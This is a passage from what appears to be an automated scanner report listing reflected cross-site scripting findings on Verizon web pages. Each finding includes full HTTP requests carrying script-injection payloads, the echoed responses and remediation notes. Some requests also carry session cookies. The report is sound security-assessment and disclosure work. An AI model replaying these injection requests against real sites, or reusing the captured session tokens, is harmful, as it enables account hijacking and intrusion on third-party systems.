User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VZCSESSIONID=pzXmMnyQTb42YxPF5zChrLL6lWsx59ykGSv2bHvZypcp7dnglchj!1878479263; WT_FPC=id=2a956fa7855af7d0ca11290210227164:lv=1290210227164:ss=1290210227164; ASPSESSIONIDSAQTRRDD=PMLDAEBDKKNJNKIEJDFGBDKJ; ASPSESSIONIDCSRRSSBB=GPELJEBDJBIPHJOBICKILKME; amlbcookie=02; lob=webmail; POPLocation=popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=; POPRefid=refid=&refresh=y&reftrytime=0&refnum=

Response

HTTP/1.1 200 OK
Server: Apache
Content-Length: 221
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: policyref="/w3c/p3p.xml", CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Expires: Sat, 20 Nov 2010 02:07:37 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 20 Nov 2010 02:07:37 GMT
Connection: close


<script>
   window.location = "http://www.verizon.net/central/vzc.portal?_nfpb=true&_pageLabel=google_results&q='&web_search_type=basic63d6b"-alert(1)-"fda7c8459b2&clientid=cnsmr&channel=Nwcnsmr";
</script>

3.102. https://www.verizon.net/ssowebapp/VOLPortalLogin [clientId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.verizon.net
Path:   /ssowebapp/VOLPortalLogin

Issue detail

The value of the clientId request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 983ec"><script>alert(1)</script>841594c598 was submitted in the clientId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ssowebapp/VOLPortalLogin?stid=off&clientId=cnsmrshp983ec"><script>alert(1)</script>841594c598&TARGET=http%3a%2f%2fsurround.verizon.net%2fshop%2fshopRedirect.aspx%3foid%3dVX765 HTTP/1.1
Host: www.verizon.net
Connection: keep-alive
Referer: http://surround.verizon.net/Shop/featuredOffers/default.aspx
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VZCSESSIONID=pzXmMnyQTb42YxPF5zChrLL6lWsx59ykGSv2bHvZypcp7dnglchj!1878479263; ASPSESSIONIDSAQTRRDD=PMLDAEBDKKNJNKIEJDFGBDKJ; ASPSESSIONIDCSRRSSBB=GPELJEBDJBIPHJOBICKILKME; amlbcookie=02; ASPSESSIONIDQATSQSBC=MEKENDBDIDAPOCCODLFOHPEE; NEWSROOMAPPID=kV3wMnpRBGZtF47vYMhnC6H01yDyknH7BDQrjhgzl9X05vXG1xV1!1633138470; lob=webmail; state=; product_type=Unknown; op629viss-vobsgum=a00n02c07e26bkl00g6vda26bkl00m6pje9da; hvariable=0; WT_FPC=id=2a956fa7855af7d0ca11290210227164:lv=1290210674565:ss=1290210227164; POPLocation=popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=; POPRefid=refid=&refresh=y&reftrytime=0&refnum=

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: policyref="/w3c/p3p.xml", CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Expires: Sat, 20 Nov 2010 02:16:23 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 20 Nov 2010 02:16:23 GMT
Connection: keep-alive
Set-Cookie: VZSSO_SESSIONID=GZFyMnvXscXgyJwMnppC9Y8Qnl9rrgznxGLLcNvxtXFP68WvTmrC!703478465; path=/
Set-Cookie: lob=consumer; domain=verizon.net; path=/
Set-Cookie: AprURL=http%3A%2F%2Fsurround.verizon.net%2Fshop%2FshopRedirect.aspx%3Foid%3DVX765; domain=verizon.net; path=/
Set-Cookie: ActualProtectedResource=http://surround.verizon.net/shop/shopRedirect.aspx?oid=VX765; domain=verizon.net; path=/
Content-Length: 29010


<!-- Instance name: sso3a -->


<html>

<head>
<META HTTP-EQUIV="CACHE-CONTROL" CONTENT="NO-CACHE">

<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
<title>Sign In</titl
...[SNIP]...
<input type="hidden" name="clientId" value="cnsmrshp983ec"><script>alert(1)</script>841594c598" />
...[SNIP]...

3.103. http://www.verizonwireless.com/b2c/store/controller [action parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.verizonwireless.com
Path:   /b2c/store/controller

Issue detail

The value of the action request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 159a9"><script>alert(1)</script>cea6d5d8c05 was submitted in the action parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /b2c/store/controller?item=phoneFirst&action=viewPhoneOverviewByDevice159a9"><script>alert(1)</script>cea6d5d8c05&deviceType=Phones&sortOption=priceSort HTTP/1.1
Host: www.verizonwireless.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GLOBALID=Pd7heRjrt%2FuCPQBUNOAuEUAvc6Cz3xUJf%2BIm%2FimB5ZUiXAkDciU7roQLCjQwOFAY; JSESSIONIDB2C=34HnMnybR3JjF5Q2QP6kh6v7nZvGF78XPGjlt264zvL1KcbBDCQb!383928044!cash!5106!-1; NSC_xxx_xmt_c2d_mcwt=44ad7f0825c2; NSC_xxx_hwt=c7ef56f80000

Response

HTTP/1.1 200 OK
Cache-Control: no-cache="Set-Cookie"
Date: Sat, 20 Nov 2010 01:45:32 GMT
Content-Type: text/html; charset=ISO-8859-1
Set-Cookie: SESSION_VALUE=34HnMnybR3JjF5Q2QP6kh6v7nZvGF78XPGjlt264zvL1KcbBDCQb!383928044!cash!5106!-1!1290217499071; domain=www.verizonwireless.com; path=/
Set-Cookie: TIME_CHECKER=1290217532779; domain=www.verizonwireless.com; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Length: 22018

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


                                                       <htm
...[SNIP]...
<input type="hidden" name="query" value="go=/store/controller&item=phoneFirst&action=viewPhoneOverviewByDevice159a9"><script>alert(1)</script>cea6d5d8c05&deviceType=Phones&sortOption=priceSort" />
...[SNIP]...

3.104. http://www.verizonwireless.com/b2c/store/controller [deviceType parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.verizonwireless.com
Path:   /b2c/store/controller

Issue detail

The value of the deviceType request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bd574"><script>alert(1)</script>6360605e49 was submitted in the deviceType parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /b2c/store/controller?item=phoneFirst&action=viewPhoneOverviewByDevice&deviceType=Phonesbd574"><script>alert(1)</script>6360605e49&sortOption=priceSort HTTP/1.1
Host: www.verizonwireless.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GLOBALID=Pd7heRjrt%2FuCPQBUNOAuEUAvc6Cz3xUJf%2BIm%2FimB5ZUiXAkDciU7roQLCjQwOFAY; JSESSIONIDB2C=34HnMnybR3JjF5Q2QP6kh6v7nZvGF78XPGjlt264zvL1KcbBDCQb!383928044!cash!5106!-1; NSC_xxx_xmt_c2d_mcwt=44ad7f0825c2; NSC_xxx_hwt=c7ef56f80000

Response

HTTP/1.1 200 OK
Cache-Control: no-cache="Set-Cookie"
Date: Sat, 20 Nov 2010 01:45:37 GMT
Content-Type: text/html; charset=ISO-8859-1
Set-Cookie: SESSION_VALUE=34HnMnybR3JjF5Q2QP6kh6v7nZvGF78XPGjlt264zvL1KcbBDCQb!383928044!cash!5106!-1!1290217499071; domain=www.verizonwireless.com; path=/
Set-Cookie: TIME_CHECKER=1290217537902; domain=www.verizonwireless.com; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Length: 22016

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


                                                       <htm
...[SNIP]...
<input type="hidden" name="query" value="go=/store/controller&item=phoneFirst&action=viewPhoneOverviewByDevice&deviceType=Phonesbd574"><script>alert(1)</script>6360605e49&sortOption=priceSort" />
...[SNIP]...

3.105. http://www.verizonwireless.com/b2c/store/controller [item parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.verizonwireless.com
Path:   /b2c/store/controller

Issue detail

The value of the item request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bf659"><script>alert(1)</script>df6912777c8 was submitted in the item parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /b2c/store/controller?item=phoneFirstbf659"><script>alert(1)</script>df6912777c8&action=viewPhoneOverviewByDevice&deviceType=Phones&sortOption=priceSort HTTP/1.1
Host: www.verizonwireless.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GLOBALID=Pd7heRjrt%2FuCPQBUNOAuEUAvc6Cz3xUJf%2BIm%2FimB5ZUiXAkDciU7roQLCjQwOFAY; JSESSIONIDB2C=34HnMnybR3JjF5Q2QP6kh6v7nZvGF78XPGjlt264zvL1KcbBDCQb!383928044!cash!5106!-1; NSC_xxx_xmt_c2d_mcwt=44ad7f0825c2; NSC_xxx_hwt=c7ef56f80000

Response

HTTP/1.1 200 OK
Cache-Control: no-cache="Set-Cookie"
Date: Sat, 20 Nov 2010 01:45:25 GMT
Content-Type: text/html; charset=ISO-8859-1
Set-Cookie: SESSION_VALUE=34HnMnybR3JjF5Q2QP6kh6v7nZvGF78XPGjlt264zvL1KcbBDCQb!383928044!cash!5106!-1!1290217499071; domain=www.verizonwireless.com; path=/
Set-Cookie: TIME_CHECKER=1290217526081; domain=www.verizonwireless.com; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Length: 22018

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


                                                       <htm
...[SNIP]...
<input type="hidden" name="query" value="go=/store/controller&item=phoneFirstbf659"><script>alert(1)</script>df6912777c8&action=viewPhoneOverviewByDevice&deviceType=Phones&sortOption=priceSort" />
...[SNIP]...

3.106. http://www.verizonwireless.com/b2c/store/controller [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.verizonwireless.com
Path:   /b2c/store/controller

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f04d3"><script>alert(1)</script>cc1eed593b6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /b2c/store/controller?item=phoneFirst&action=viewPhoneOverviewByDevice&deviceType=Phones&sortOption=priceSort&f04d3"><script>alert(1)</script>cc1eed593b6=1 HTTP/1.1
Host: www.verizonwireless.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GLOBALID=Pd7heRjrt%2FuCPQBUNOAuEUAvc6Cz3xUJf%2BIm%2FimB5ZUiXAkDciU7roQLCjQwOFAY; JSESSIONIDB2C=34HnMnybR3JjF5Q2QP6kh6v7nZvGF78XPGjlt264zvL1KcbBDCQb!383928044!cash!5106!-1; NSC_xxx_xmt_c2d_mcwt=44ad7f0825c2; NSC_xxx_hwt=c7ef56f80000

Response

HTTP/1.1 200 OK
Cache-Control: no-cache="Set-Cookie"
Date: Sat, 20 Nov 2010 01:45:52 GMT
Content-Type: text/html; charset=ISO-8859-1
Set-Cookie: SESSION_VALUE=34HnMnybR3JjF5Q2QP6kh6v7nZvGF78XPGjlt264zvL1KcbBDCQb!383928044!cash!5106!-1!1290217499071; domain=www.verizonwireless.com; path=/
Set-Cookie: TIME_CHECKER=1290217552301; domain=www.verizonwireless.com; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Length: 21958

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


                                                       <htm
...[SNIP]...
<input type="hidden" name="query" value="go=/store/controller&item=phoneFirst&action=viewPhoneOverviewByDevice&deviceType=Phones&sortOption=priceSort&f04d3"><script>alert(1)</script>cc1eed593b6=1" />
...[SNIP]...

3.107. http://www.verizonwireless.com/b2c/store/controller [sortOption parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.verizonwireless.com
Path:   /b2c/store/controller

Issue detail

The value of the sortOption request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7f90f"><script>alert(1)</script>154bd675ac6 was submitted in the sortOption parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /b2c/store/controller?item=phoneFirst&action=viewPhoneOverviewByDevice&deviceType=Phones&sortOption=priceSort7f90f"><script>alert(1)</script>154bd675ac6 HTTP/1.1
Host: www.verizonwireless.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GLOBALID=Pd7heRjrt%2FuCPQBUNOAuEUAvc6Cz3xUJf%2BIm%2FimB5ZUiXAkDciU7roQLCjQwOFAY; JSESSIONIDB2C=34HnMnybR3JjF5Q2QP6kh6v7nZvGF78XPGjlt264zvL1KcbBDCQb!383928044!cash!5106!-1; NSC_xxx_xmt_c2d_mcwt=44ad7f0825c2; NSC_xxx_hwt=c7ef56f80000

Response

HTTP/1.1 200 OK
Cache-Control: no-cache="Set-Cookie"
Date: Sat, 20 Nov 2010 01:45:42 GMT
Content-Type: text/html; charset=ISO-8859-1
Set-Cookie: SESSION_VALUE=34HnMnybR3JjF5Q2QP6kh6v7nZvGF78XPGjlt264zvL1KcbBDCQb!383928044!cash!5106!-1!1290217499071; domain=www.verizonwireless.com; path=/
Set-Cookie: TIME_CHECKER=1290217542028; domain=www.verizonwireless.com; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Length: 21955

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


                                                       <htm
...[SNIP]...
<input type="hidden" name="query" value="go=/store/controller&item=phoneFirst&action=viewPhoneOverviewByDevice&deviceType=Phones&sortOption=priceSort7f90f"><script>alert(1)</script>154bd675ac6" />
...[SNIP]...

3.108. http://www22.business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www22.business.verizon.net
Path:   /SMBPortalWeb/appmanager/SMBPortal/smb

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 2b92a(a)3fb18037f68 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /SMBPortalWeb/appmanager/SMBPortal2b92a(a)3fb18037f68/smb?_nfpb=true&_pageLabel=SMBPortal_page_main_marketplace&showGS=true HTTP/1.1
Host: www22.business.verizon.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: amlbcookie=02; state=; product_type=Unknown; op629viss-vobsgum=a00n02c07e26bkl00g6vda26bkl00m6pje9da; hvariable=0; POPLocation=popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=; POPRefid=refid=&refresh=y&reftrytime=0&refnum=; SITESERVER=ID=2c8e1022bf0cc917099edbc587c6cb62; lob=consumer; AprURL=http%3A%2F%2Fsurround.verizon.net%2FShop%2FUtilities%2FDefault.aspx; ActualProtectedResource=http://surround.verizon.net/Shop/Utilities/Default.aspx

Response (redirected)

HTTP/1.1 404 Not Found
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8b
Content-Length: 81
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html; charset=UTF-8
Expires: Sat, 20 Nov 2010 03:07:09 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 20 Nov 2010 03:07:09 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: SaasSessionID=3Wv1Mn7dQ3C2rWTzcFFqCm50vMk5HvpjbhG9JWDGq3vsWv8NptVn!-2072702529; path=/

Resource /SMBPortal2b92a(a)3fb18037f68/smb could not be resolved for locale null.

3.109. http://www22.business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www22.business.verizon.net
Path:   /SMBPortalWeb/appmanager/SMBPortal/smb

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload b793e(a)11cbe181d16 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /SMBPortalWeb/appmanager/SMBPortal/smbb793e(a)11cbe181d16?_nfpb=true&_pageLabel=SMBPortal_page_main_marketplace&showGS=true HTTP/1.1
Host: www22.business.verizon.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: amlbcookie=02; state=; product_type=Unknown; op629viss-vobsgum=a00n02c07e26bkl00g6vda26bkl00m6pje9da; hvariable=0; POPLocation=popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=; POPRefid=refid=&refresh=y&reftrytime=0&refnum=; SITESERVER=ID=2c8e1022bf0cc917099edbc587c6cb62; lob=consumer; AprURL=http%3A%2F%2Fsurround.verizon.net%2FShop%2FUtilities%2FDefault.aspx; ActualProtectedResource=http://surround.verizon.net/Shop/Utilities/Default.aspx

Response (redirected)

HTTP/1.1 404 Not Found
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8b
Content-Length: 81
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html; charset=UTF-8
Expires: Sat, 20 Nov 2010 03:07:09 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 20 Nov 2010 03:07:09 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: SaasSessionID=RQNpMn7dCvNNTPY5T5Hy0PGmqJrhpX4vKCMRrnr7kQRgpSVl5sy3!-1644393018; path=/

Resource /SMBPortal/smbb793e(a)11cbe181d16 could not be resolved for locale null.

3.110. http://www22.business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb [_pageLabel parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www22.business.verizon.net
Path:   /SMBPortalWeb/appmanager/SMBPortal/smb

Issue detail

The value of the _pageLabel request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 12ba5'-alert(1)-'185cc5084d0 was submitted in the _pageLabel parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /SMBPortalWeb/appmanager/SMBPortal/smb?_nfpb=true&_pageLabel=SMBPortal_page_main_marketplace12ba5'-alert(1)-'185cc5084d0&showGS=true HTTP/1.1
Host: www22.business.verizon.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: amlbcookie=02; state=; product_type=Unknown; op629viss-vobsgum=a00n02c07e26bkl00g6vda26bkl00m6pje9da; hvariable=0; POPLocation=popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=; POPRefid=refid=&refresh=y&reftrytime=0&refnum=; SITESERVER=ID=2c8e1022bf0cc917099edbc587c6cb62; lob=consumer; AprURL=http%3A%2F%2Fsurround.verizon.net%2FShop%2FUtilities%2FDefault.aspx; ActualProtectedResource=http://surround.verizon.net/Shop/Utilities/Default.aspx

Response (redirected)

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8b
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html; charset=UTF-8
Expires: Sat, 20 Nov 2010 03:07:09 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 20 Nov 2010 03:07:09 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: SaasSessionID=6BFkMn7cQlKLsvfzxSGcmYJpLqLvp8BpnKlLwn40STNYtD5rY6v1!1950273172; path=/
Content-Length: 112566

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><title>Verizon Sma
...[SNIP]...
aderText");
           
       if(searchFlow != null && searchFlow == "Shop")
           searchBox = document.getElementById("searchShopHeaderText");    
       
       var f_pageDefLabel = 'SMBPortal_page_main_marketplace12ba5'-alert(1)-'185cc5084d0';
       if (f_pageDefLabel != "SMBPortal_page_SignIn")
           searchBox.focus();
   }
   
   onload = focusIt;
   // end WR 61703
   
</script>
...[SNIP]...

3.111. http://www22.verizon.com/ForyourHome/Registration/Reg/OrLogin.aspx [3828e">450552b46bf parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /ForyourHome/Registration/Reg/OrLogin.aspx

Issue detail

The value of the 3828e"><script>alert(1)</script>450552b46bf request parameter is copied into the HTML document as plain text between tags. The payload 30dd7<script>alert(1)</script>5e4c65629c4 was submitted in the 3828e"><script>alert(1)</script>450552b46bf parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ForyourHome/Registration/Reg/OrLogin.aspx?3828e"><script>alert(1)</script>450552b46bf=130dd7<script>alert(1)</script>5e4c65629c4 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www22.verizon.com
Cookie: CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; CMS_TimeZoneOffset=360; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; vzapps=STATE=TX; Source=CHSI

Response

